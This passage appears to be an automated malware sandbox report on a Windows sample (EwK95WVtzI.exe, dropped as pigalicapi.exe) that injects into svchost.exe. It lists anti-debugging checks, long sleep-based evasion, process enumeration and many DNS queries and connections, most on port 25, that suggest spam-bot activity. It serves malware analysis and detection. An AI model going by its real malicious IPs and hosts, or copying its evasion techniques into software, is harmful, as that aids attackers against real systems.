                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2231Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1882Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1879Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 826
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 803
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-11533
                Source: C:\Users\user\pigalicapi.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-11534
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_1314E02212_2_1314E022
                Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: GetAdaptersInfo,0_2_013F9F70
                Source: C:\Users\user\pigalicapi.exeCode function: GetAdaptersInfo,4_2_00A19F70
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeThread delayed: delay time: 21600000Jump to behavior
                Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 71589Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 64001Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 83015Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 94307Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 108359Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 85058Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 104700Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeAPI call chain: ExitProcess graph end nodegraph_0-11422
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeAPI call chain: ExitProcess graph end nodegraph_0-11152
                Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_4-11423
                Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_4-11154
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-17267
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-17272
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-17398
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                Source: EwK95WVtzI.exe, 00000000.00000003.1407463522.0000000001687000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW4
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407437692.0000000007796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,0_2_013F8F80
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050C473 FindFirstFileExW,0_2_0050C473
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0056C473 FindFirstFileExW,4_2_0056C473
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F1CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_013F1CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,6_2_0408BF20
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00508970 mov eax, dword ptr fs:[00000030h]0_2_00508970
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F3090 mov eax, dword ptr fs:[00000030h]0_2_013F3090
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013FEF90 mov eax, dword ptr fs:[00000030h]0_2_013FEF90
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00FE6000 mov eax, dword ptr fs:[00000030h]0_2_00FE6000
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00568970 mov eax, dword ptr fs:[00000030h]4_2_00568970
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A13090 mov eax, dword ptr fs:[00000030h]4_2_00A13090
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A1EF90 mov eax, dword ptr fs:[00000030h]4_2_00A1EF90
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_009D6000 mov eax, dword ptr fs:[00000030h]4_2_009D6000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00401005 mov eax, dword ptr fs:[00000030h]6_2_00401005
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04001A30 mov eax, dword ptr fs:[00000030h]6_2_04001A30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04001900 mov eax, dword ptr fs:[00000030h]8_2_04001900
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00506465 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00506465
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00508EDA GetProcessHeap,0_2_00508EDA
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00506465 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00506465
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050A4CA SetUnhandledExceptionFilter,0_2_0050A4CA
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050A60C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0050A60C
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050A338 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0050A338
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F3B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,0_2_013F3B00
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00566465 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00566465
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0056A4CA SetUnhandledExceptionFilter,4_2_0056A4CA
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0056A60C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0056A60C
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0056A338 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0056A338
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A13B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,4_2_00A13B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_1315634B SetUnhandledExceptionFilter,8_2_1315634B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_1315536F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1315536F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_13152265 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_13152265
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_13152925 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_13152925
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_1315635B SetUnhandledExceptionFilter,11_2_1315635B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_1315537F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1315537F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_13152275 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_13152275
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_13152935 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_13152935
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_1315635B SetUnhandledExceptionFilter,12_2_1315635B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_1315537F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1315537F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_13152275 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_13152275
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_13152935 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_13152935

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx4.burnserver.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: troygroup.com.2.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: optilink.us
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.204.160 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns2.webunlimited.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: aspmx3.googlemail.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: foodallergy-com.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 1thecity.biz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns2.centrum.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: srbattery.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.74.141 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: karan-carpets.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: comstarauto.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp-agent12.mountsinai.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: iclud.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: polishprincess.us
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nscable.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cei.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: netoverdrive-com-au.p10.mxthunder.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccamatil.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: memorialhermann.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: slochamber.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 88.86.118.82 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: visimax-com-au.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: orcon.net.nz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivienvitolo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail3.ocel.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rxlps-com.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: usadig.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: immobiliarepunto.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cargill.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: travelpack.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rustici.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: otegroup.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: victoriamansion.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: adler-lacke.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: productivitymind.de
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcl-com.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns6444.hostgator.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa.inbound.socket.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ghnt.nhs.uk
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: virusadv.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: karamian.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bee-s.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.186 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: syntrans.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns3.combell.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sabrain.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dessy.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.wido.info
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: unav.es
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: antiochgolfclub.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hasslo.ns.cloudflare.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: chpnet.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ebtnet.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hotmial.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bt.pf
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: em4.mainnetmail.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.107 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx.zoho.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sbcglobqal.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cabonet.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: zeiss.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bvcaa.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.selectel.ru
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: visiorisk.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hostcalls.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx1.orcon.net.nz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: d160221b.ess.barracudanetworks.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.medius.si
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.186.33.16 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hotmai.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.12.34 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vizi0n.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: prodigy.net.mx
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mta-gw.infomaniak.ch
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: peoplescom-net.mx.av-mx.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bedmod.co.uk
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vipmail.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: send.aweber.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fallsburgny.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bpai.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: newmail.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftc-i.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.42.191.40 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: igexsolutions.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.culver.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: kelon.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.46.30.77 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: em4.rejecthost.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: blog-galaxy.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.255.29.192 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: asl.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.145.148 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.reg.ru
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: slns1.namespro.ca
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: minglebox.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: botters.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxpro02.yovocloud.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: voiaj.md
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fallsburgny.com.1.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.owsports.ca
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.59 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pat.ns.cloudflare.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ovam.be
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: uoit.ca
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.135.11 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: inbound-smtp.us-east-1.amazonaws.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymaio.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dessy.com.2.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 2980.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nv.ccsd.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fastleader.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dead.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.146.154 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.servconfig.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx.leonet.it
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gaimil.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: me-cfs.info
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.29.72 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: naui.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: univ-paris-diderot.fr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 207.180.198.201 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dowser.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: lancemore.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ginospizza.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rightstartmortgage-com.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1-proddns.glbdns.o365filtering.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: minock.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: icci.us
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: personeltedarik.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.122.205 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: barracuda.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa-001d4f01.gslb.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: thehealthline.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: riminireservation.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: marcovasco.fr
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: visimax.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: lanskroun.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: socket.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.125.137.27 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail51.gullestrupnet.dk
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vektor.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.76.140 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: uniparthenope.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: resumesrv.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: reaganfoundation.org.1.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.iptwins.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hearst.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: metro-trust.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fedteldirect.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: buildness.pt
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.tspl-india.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx02.xnote.us
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx0a-00170501.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dns12.ovh.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: moldmasters.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fletchers.uk.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vmbuildingsolutions.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: irvingisd.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: icci.us.1.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cdw.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: adlerlacke-com01c.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: suddenlink.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.0.97.108 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fhbg.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
